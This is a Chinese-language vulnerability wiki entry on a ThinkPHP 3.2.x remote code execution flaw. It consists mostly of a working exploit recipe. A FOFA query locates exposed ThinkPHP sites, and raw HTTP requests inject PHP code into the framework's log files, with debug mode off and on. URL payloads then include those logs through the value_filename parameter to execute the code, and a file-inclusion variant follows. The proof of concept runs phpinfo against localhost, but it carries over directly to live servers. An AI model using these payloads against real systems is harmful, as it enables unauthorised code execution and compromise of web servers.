Loading
0

ThinkPHP3.2.x RCE漏洞

免费、自由、人人可编辑的漏洞库

,

FOFA

header="thinkphp"

漏洞利用

关闭Debug: 

GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66;
Upgrade-Insecure-Requests: 1

日志文件 

\Application\Runtime\Logs\Common\21_06_30.log

Payload 

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value_filename=./Application/Runtime/Logs/Common/21_06_30.log

PHPINFO执行成功。

开启Debug: 

GET /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66;
Upgrade-Insecure-Requests: 1

日志文件 

\Application\Runtime\Logs\Home\21_06_30.log

Payload 

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value_filename=./Application/Runtime/Logs/Home/21_06_30.log

文件上传

http://127.0.0.1/index.php?m=Home&c=Index&a=index&value_filename=./test.txt

参考

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

pwnwiki.com